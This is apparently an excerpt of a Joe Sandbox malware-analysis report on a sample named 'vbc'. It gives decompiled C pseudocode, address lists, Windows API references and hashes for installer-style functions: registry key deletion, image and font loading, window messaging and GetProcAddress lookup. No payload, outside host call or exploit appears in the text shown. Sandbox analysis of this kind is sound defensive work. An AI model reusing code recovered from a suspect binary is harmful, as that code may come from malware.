                    					L9:
                    					_t37 = E734F12CC(0x734f5044);
                    					goto L10;
                    				}
                    			}











                    0x734f2494
                    0x734f2498
                    0x734f24a3
                    0x734f24a3
                    0x734f24aa
                    0x734f24af
                    0x00000000
                    0x00000000
                    0x734f24b3
                    0x734f24b6
                    0x00000000
                    0x00000000
                    0x734f24bb
                    0x734f24c6
                    0x734f24d6
                    0x00000000
                    0x734f24cd
                    0x734f24cf
                    0x734f24e5
                    0x00000000
                    0x734f24e5
                    0x734f24bd
                    0x734f24bd
                    0x734f24e6
                    0x734f24e6
                    0x734f24e8
                    0x734f24ec
                    0x734f24ec
                    0x734f24ef
                    0x734f24ef
                    0x734f24f7
                    0x734f24ff
                    0x734f2502
                    0x734f25c1
                    0x734f25c2
                    0x734f25cd
                    0x734f25f7
                    0x734f25f7
                    0x734f25dd
                    0x734f25e9
                    0x734f25df
                    0x734f25df
                    0x734f25df
                    0x00000000
                    0x734f2508
                    0x734f2508
                    0x00000000
                    0x734f250f
                    0x00000000
                    0x00000000
                    0x734f2517
                    0x00000000
                    0x00000000
                    0x734f2525
                    0x734f2527
                    0x00000000
                    0x00000000
                    0x734f2548
                    0x734f254e
                    0x734f2551
                    0x734f2553
                    0x734f2563
                    0x00000000
                    0x00000000
                    0x734f2530
                    0x734f2535
                    0x734f2538
                    0x734f2539
                    0x00000000
                    0x00000000
                    0x734f256f
                    0x734f2575
                    0x734f2576
                    0x734f2579
                    0x734f257a
                    0x734f257c
                    0x00000000
                    0x00000000
                    0x734f2588
                    0x734f258b
                    0x734f2597
                    0x734f2599
                    0x00000000
                    0x00000000
                    0x734f25a5
                    0x734f25b1
                    0x734f25b4
                    0x734f25b6
                    0x734f25b9
                    0x00000000
                    0x00000000
                    0x734f2508
                    0x734f2502
                    0x734f24db
                    0x734f24e0
                    0x00000000
                    0x734f24e0

                    APIs
                    • GlobalFree.KERNEL32(00000000), ref: 734F25C2
                      • Part of subcall function 734F12CC: lstrcpynW.KERNEL32(00000000,?,734F137F,00000019,734F11CA,-000000A0), ref: 734F12DC
                    • GlobalAlloc.KERNEL32(00000040), ref: 734F2548
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 734F2563
                    Memory Dump Source
                    • Source File: 00000004.00000002.1159305311.00000000734F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 734F0000, based on PE: true
                    • Associated: 00000004.00000002.1159300360.00000000734F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000004.00000002.1159309786.00000000734F4000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000004.00000002.1159313695.00000000734F6000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_734f0000_vbc.jbxd
                    Similarity
                    • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                    • String ID:
                    • API String ID: 4216380887-0
                    • Opcode ID: 48c3d64306c49c2946d6aa7ebe053043f8ae2c5aad39ea6ad2126c187571ac00
                    • Instruction ID: b86d4a62d0bede8048e85a752c99c46de153c9a5163161af9ff9b64bfe6262a6
                    • Opcode Fuzzy Hash: 48c3d64306c49c2946d6aa7ebe053043f8ae2c5aad39ea6ad2126c187571ac00
                    • Instruction Fuzzy Hash: E641BEB900870BEFE75CEF25D840B2677F8FB44310F1C891DE45A96681EB70A545CB69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 48%
                    			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                    				void* _v8;
                    				int _v12;
                    				short _v536;
                    				void* _t27;
                    				signed int _t33;
                    				intOrPtr* _t35;
                    				signed int _t45;
                    				signed int _t46;
                    				signed int _t47;
                    
                    				_t46 = _a12;
                    				_t47 = _t46 & 0x00000300;
                    				_t45 = _t46 & 0x00000001;
                    				_t27 = E00406387(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                    				if(_t27 == 0) {
                    					if((_a12 & 0x00000002) == 0) {
                    						L3:
                    						_push(0x105);
                    						_push( &_v536);
                    						_push(0);
                    						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
                    							__eflags = _t45;
                    							if(__eflags != 0) {
                    								L10:
                    								RegCloseKey(_v8);
                    								return 0x3eb;
                    							}
                    							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
                    							__eflags = _t33;
                    							if(_t33 != 0) {
                    								break;
                    							}
                    							_push(0x105);
                    							_push( &_v536);
                    							_push(_t45);
                    						}
                    						RegCloseKey(_v8);
                    						_t35 = E004068E7(3);
                    						if(_t35 != 0) {
                    							return  *_t35(_a4, _a8, _t47, 0);
                    						}
                    						return RegDeleteKeyW(_a4, _a8);
                    					}
                    					_v12 = 0;
                    					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
                    						goto L10;
                    					}
                    					goto L3;
                    				}
                    				return _t27;
                    			}












                    0x00402eb4
                    0x00402ebd
                    0x00402ec6
                    0x00402ed2
                    0x00402edb
                    0x00402ee5
                    0x00402f0a
                    0x00402f10
                    0x00402f15
                    0x00402f16
                    0x00402f46
                    0x00402f1f
                    0x00402f21
                    0x00402f71
                    0x00402f74
                    0x00000000
                    0x00402f7a
                    0x00402f30
                    0x00402f35
                    0x00402f37
                    0x00000000
                    0x00000000
                    0x00402f3f
                    0x00402f44
                    0x00402f45
                    0x00402f45
                    0x00402f52
                    0x00402f5a
                    0x00402f61
                    0x00000000
                    0x00402f8a
                    0x00000000
                    0x00402f69
                    0x00402ef5
                    0x00402f08
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00402f08
                    0x00402f90

                    APIs
                    • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00402EFD
                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                    • RegCloseKey.ADVAPI32(?), ref: 00402F52
                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                    • RegCloseKey.ADVAPI32(?), ref: 00402F74
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: CloseEnum$DeleteValue
                    • String ID:
                    • API String ID: 1354259210-0
                    • Opcode ID: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                    • Instruction ID: c11aca49d0effc85046ccc9aadc56b913b01f210672418aaa5aa9f4d8e4c938e
                    • Opcode Fuzzy Hash: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                    • Instruction Fuzzy Hash: 8C212A7150010ABBDF11AF90CE89EEF7B7DEB54384F110076F909B21A0D7B59E54AA68
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 77%
                    			E00401D81(void* __ebx, void* __edx) {
                    				struct HWND__* _t30;
                    				WCHAR* _t38;
                    				void* _t48;
                    				void* _t53;
                    				signed int _t55;
                    				signed int _t60;
                    				long _t63;
                    				void* _t65;
                    
                    				_t53 = __ebx;
                    				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
                    					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
                    				} else {
                    					E00402D84(2);
                    					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
                    				}
                    				_t55 =  *(_t65 - 0x24);
                    				 *(_t65 + 8) = _t30;
                    				_t60 = _t55 & 0x00000004;
                    				 *(_t65 - 0x38) = _t55 & 0x00000003;
                    				 *(_t65 - 0x18) = _t55 >> 0x1f;
                    				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
                    				if((_t55 & 0x00010000) == 0) {
                    					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
                    				} else {
                    					_t38 = E00402DA6(0x11);
                    				}
                    				 *(_t65 - 0x44) = _t38;
                    				GetClientRect( *(_t65 + 8), _t65 - 0x60);
                    				asm("sbb esi, esi");
                    				_t63 = LoadImageW( ~_t60 &  *0x7a8a60,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
                    				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
                    				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
                    					DeleteObject(_t48);
                    				}
                    				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
                    					_push(_t63);
                    					E00406461();
                    				}
                    				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t65 - 4));
                    				return 0;
                    			}











                    0x00401d81
                    0x00401d85
                    0x00401d9a
                    0x00401d87
                    0x00401d89
                    0x00401d8f
                    0x00401d8f
                    0x00401da0
                    0x00401da3
                    0x00401dad
                    0x00401db0
                    0x00401db8
                    0x00401dc9
                    0x00401dcc
                    0x00401dd7
                    0x00401dce
                    0x00401dd0
                    0x00401dd0
                    0x00401ddb
                    0x00401de5
                    0x00401e0c
                    0x00401e1b
                    0x00401e29
                    0x00401e31
                    0x00401e39
                    0x00401e39
                    0x00401e42
                    0x00401e48
                    0x00402ba4
                    0x00402ba4
                    0x00402c2d
                    0x00402c39

                    APIs
                    • GetDlgItem.USER32(?,?), ref: 00401D9A
                    • GetClientRect.USER32 ref: 00401DE5
                    • LoadImageW.USER32 ref: 00401E15
                    • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                    • DeleteObject.GDI32(00000000), ref: 00401E39
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                    • String ID:
                    • API String ID: 1849352358-0
                    • Opcode ID: 132564bbd8200f7e0b28f89bf5610b7946a6e505595dff695356bd6c1208d134
                    • Instruction ID: 28669104e63112c2688ec1bf4ccd66a2dfd92d91aff3cd1988410ea650e2814b
                    • Opcode Fuzzy Hash: 132564bbd8200f7e0b28f89bf5610b7946a6e505595dff695356bd6c1208d134
                    • Instruction Fuzzy Hash: 1721F672D04119AFCB05DBA4DE45AEEBBB5EF08304F14403AF945F62A0DB389951DB98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 73%
                    			E00401E4E(intOrPtr __edx) {
                    				void* __edi;
                    				int _t9;
                    				signed char _t15;
                    				struct HFONT__* _t18;
                    				intOrPtr _t30;
                    				void* _t31;
                    				struct HDC__* _t33;
                    				void* _t35;
                    
                    				_t30 = __edx;
                    				_t33 = GetDC( *(_t35 - 8));
                    				_t9 = E00402D84(2);
                    				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                    				0x40cdc8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
                    				ReleaseDC( *(_t35 - 8), _t33);
                    				 *0x40cdd8 = E00402D84(3);
                    				_t15 =  *((intOrPtr*)(_t35 - 0x20));
                    				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                    				 *0x40cddf = 1;
                    				 *0x40cddc = _t15 & 0x00000001;
                    				 *0x40cddd = _t15 & 0x00000002;
                    				 *0x40cdde = _t15 & 0x00000004;
                    				E00406557(_t9, _t31, _t33, 0x40cde4,  *((intOrPtr*)(_t35 - 0x2c)));
                    				_t18 = CreateFontIndirectW(0x40cdc8);
                    				_push(_t18);
                    				_push(_t31);
                    				E00406461();
                    				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t35 - 4));
                    				return 0;
                    			}











                    0x00401e4e
                    0x00401e59
                    0x00401e5b
                    0x00401e68
                    0x00401e7f
                    0x00401e84
                    0x00401e91
                    0x00401e96
                    0x00401e9a
                    0x00401ea5
                    0x00401eac
                    0x00401ebe
                    0x00401ec4
                    0x00401ec9
                    0x00401ed3
                    0x00402638
                    0x0040156d
                    0x00402ba4
                    0x00402c2d
                    0x00402c39

                    APIs
                    • GetDC.USER32(?), ref: 00401E51
                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                    • MulDiv.KERNEL32 ref: 00401E73
                    • ReleaseDC.USER32(?,00000000), ref: 00401E84
                      • Part of subcall function 00406557: lstrcatW.KERNEL32 ref: 004066FC
                      • Part of subcall function 00406557: lstrlenW.KERNEL32(Call,00000000,007A0F28,?,004055B3,007A0F28,00000000), ref: 00406756
                    • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED3
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                    • String ID:
                    • API String ID: 2584051700-0
                    • Opcode ID: 80dbc2b2fae4c7c566210f3db186a97745b6b4268190bf82bcd042cd3ccc65f3
                    • Instruction ID: 0d45dbb9e622ade016cb62109ac663f1c9afcfae21dbc147df73c93619ae97e2
                    • Opcode Fuzzy Hash: 80dbc2b2fae4c7c566210f3db186a97745b6b4268190bf82bcd042cd3ccc65f3
                    • Instruction Fuzzy Hash: 6401D871940641EFEB006BB4AE89BDA3FB0AF15301F10493AF141B61D2C6B90404DB2C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E734F16BD(struct HINSTANCE__* _a4, short* _a8) {
                    				_Unknown_base(*)()* _t7;
                    				void* _t10;
                    				int _t14;
                    
                    				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
                    				_t10 = GlobalAlloc(0x40, _t14);
                    				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
                    				_t7 = GetProcAddress(_a4, _t10);
                    				GlobalFree(_t10);
                    				return _t7;
                    			}






                    0x734f16d7
                    0x734f16e3
                    0x734f16f0
                    0x734f16f7
                    0x734f1700
                    0x734f170c

                    APIs
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,734F22D8,?,00000808), ref: 734F16D5
                    • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,734F22D8,?,00000808), ref: 734F16DC
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,734F22D8,?,00000808), ref: 734F16F0
                    • GetProcAddress.KERNEL32(734F22D8,00000000,?,00000000,734F22D8,?,00000808), ref: 734F16F7
                    • GlobalFree.KERNEL32(00000000), ref: 734F1700
                    Memory Dump Source
                    • Source File: 00000004.00000002.1159305311.00000000734F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 734F0000, based on PE: true
                    • Associated: 00000004.00000002.1159300360.00000000734F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000004.00000002.1159309786.00000000734F4000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000004.00000002.1159313695.00000000734F6000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_734f0000_vbc.jbxd
                    Similarity
                    • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                    • String ID:
                    • API String ID: 1148316912-0
                    • Opcode ID: 96775bedf3ef678221b402eba9db34efd17b524b9f183c3109013a8af145cbf6
                    • Instruction ID: 81bc5ece0a6fb62c237e185f29be97b6922663b2ae160f259f95a576c2cda87e
                    • Opcode Fuzzy Hash: 96775bedf3ef678221b402eba9db34efd17b524b9f183c3109013a8af145cbf6
                    • Instruction Fuzzy Hash: 05F0A2731061397FD6212AA78C4CD9B7E9CDF8B2F5B150215F61CA129089615D11D7F1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 59%
                    			E00401C43(intOrPtr __edx) {
                    				int _t29;
                    				long _t30;
                    				signed int _t32;
                    				WCHAR* _t35;
                    				long _t36;
                    				int _t41;
                    				signed int _t42;
                    				int _t46;
                    				int _t56;
                    				intOrPtr _t57;
                    				struct HWND__* _t63;
                    				void* _t64;
                    
                    				_t57 = __edx;
                    				_t29 = E00402D84(3);
                    				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                    				 *(_t64 - 0x18) = _t29;
                    				_t30 = E00402D84(4);
                    				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                    				 *(_t64 + 8) = _t30;
                    				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
                    					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
                    				}
                    				__eflags =  *(_t64 - 0x1c) & 0x00000002;
                    				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
                    					 *(_t64 + 8) = E00402DA6(0x44);
                    				}
                    				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
                    				_push(1);
                    				if(__eflags != 0) {
                    					_t61 = E00402DA6();
                    					_t32 = E00402DA6();
                    					asm("sbb ecx, ecx");
                    					asm("sbb eax, eax");
                    					_t35 =  ~( *_t31) & _t61;
                    					__eflags = _t35;
                    					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                    					goto L10;
                    				} else {
                    					_t63 = E00402D84();
                    					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                    					_t41 = E00402D84(2);
                    					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                    					_t56 =  *(_t64 - 0x1c) >> 2;
                    					if(__eflags == 0) {
                    						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
                    						L10:
                    						 *(_t64 - 0x38) = _t36;
                    					} else {
                    						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
                    						asm("sbb eax, eax");
                    						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                    					}
                    				}
                    				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
                    				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
                    					_push( *(_t64 - 0x38));
                    					E00406461();
                    				}
                    				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t64 - 4));
                    				return 0;
                    			}















                    0x00401c43
                    0x00401c45
                    0x00401c4c
                    0x00401c4f
                    0x00401c52
                    0x00401c5c
                    0x00401c60
                    0x00401c63
                    0x00401c6c
                    0x00401c6c
                    0x00401c6f
                    0x00401c73
                    0x00401c7c
                    0x00401c7c
                    0x00401c7f
                    0x00401c83
                    0x00401c85
                    0x00401cda
                    0x00401cdc
                    0x00401ce7
                    0x00401cf1
                    0x00401cf4
                    0x00401cf4
                    0x00401cfd
                    0x00000000
                    0x00401c87
                    0x00401c8e
                    0x00401c90
                    0x00401c93
                    0x00401c99
                    0x00401ca0
                    0x00401ca3
                    0x00401ccb
                    0x00401d03
                    0x00401d03
                    0x00401ca5
                    0x00401cb3
                    0x00401cbb
                    0x00401cbe
                    0x00401cbe
                    0x00401ca3
                    0x00401d06
                    0x00401d09
                    0x00401d0f
                    0x00402ba4
                    0x00402ba4
                    0x00402c2d
                    0x00402c39

                    APIs
                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: MessageSend$Timeout
                    • String ID: !
                    • API String ID: 1777923405-2657877971
                    • Opcode ID: 7bcf9f063f3f8c1cd6765bc74cbc29e805e6a9181adc19e22c18985f917a49b0
                    • Instruction ID: f7a68e929e996113dc281fa05a4685e5ce16b579df1de56e4cd617e501a9a943
                    • Opcode Fuzzy Hash: 7bcf9f063f3f8c1cd6765bc74cbc29e805e6a9181adc19e22c18985f917a49b0
                    • Instruction Fuzzy Hash: 90219C7190421AEFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 77%
                    			E00404D23(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                    				char _v68;
                    				char _v132;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t23;
                    				signed int _t24;
                    				void* _t31;
                    				void* _t33;
                    				void* _t34;
                    				void* _t44;
                    				signed int _t46;
                    				signed int _t50;
                    				signed int _t52;
                    				signed int _t53;
                    				signed int _t55;
                    
                    				_t23 = _a16;
                    				_t53 = _a12;
                    				_t44 = 0xffffffdc;
                    				if(_t23 == 0) {
                    					_push(0x14);
                    					_pop(0);
                    					_t24 = _t53;
                    					if(_t53 < 0x100000) {
                    						_push(0xa);
                    						_pop(0);
                    						_t44 = 0xffffffdd;
                    					}
                    					if(_t53 < 0x400) {
                    						_t44 = 0xffffffde;
                    					}
                    					if(_t53 < 0xffff3333) {
                    						_t52 = 0x14;
                    						asm("cdq");
                    						_t24 = 1 / _t52 + _t53;
                    					}
                    					_t25 = _t24 & 0x00ffffff;
                    					_t55 = _t24 >> 0;
                    					_t46 = 0xa;
                    					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                    				} else {
                    					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                    					_t50 = 0;
                    				}
                    				_t31 = E00406557(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                    				_t33 = E00406557(_t44, _t50, _t55,  &_v132, _t44);
                    				_t34 = E00406557(_t44, _t50, 0x7a1f48, 0x7a1f48, _a8);
                    				wsprintfW(_t34 + lstrlenW(0x7a1f48) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                    				return SetDlgItemTextW( *0x7a7a38, _a4, 0x7a1f48);
                    			}



















                    0x00404d2c
                    0x00404d31
                    0x00404d39
                    0x00404d3a
                    0x00404d47
                    0x00404d4f
                    0x00404d50
                    0x00404d52
                    0x00404d54
                    0x00404d56
                    0x00404d59
                    0x00404d59
                    0x00404d60
                    0x00404d66
                    0x00404d66
                    0x00404d6d
                    0x00404d74
                    0x00404d77
                    0x00404d7a
                    0x00404d7a
                    0x00404d7e
                    0x00404d8e
                    0x00404d90
                    0x00404d93
                    0x00404d3c
                    0x00404d3c
                    0x00404d43
                    0x00404d43
                    0x00404d9b
                    0x00404da6
                    0x00404dbc
                    0x00404dcd
                    0x00404de9

                    APIs
                    • lstrlenW.KERNEL32(007A1F48,007A1F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DC4
                    • wsprintfW.USER32 ref: 00404DCD
                    • SetDlgItemTextW.USER32 ref: 00404DE0
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
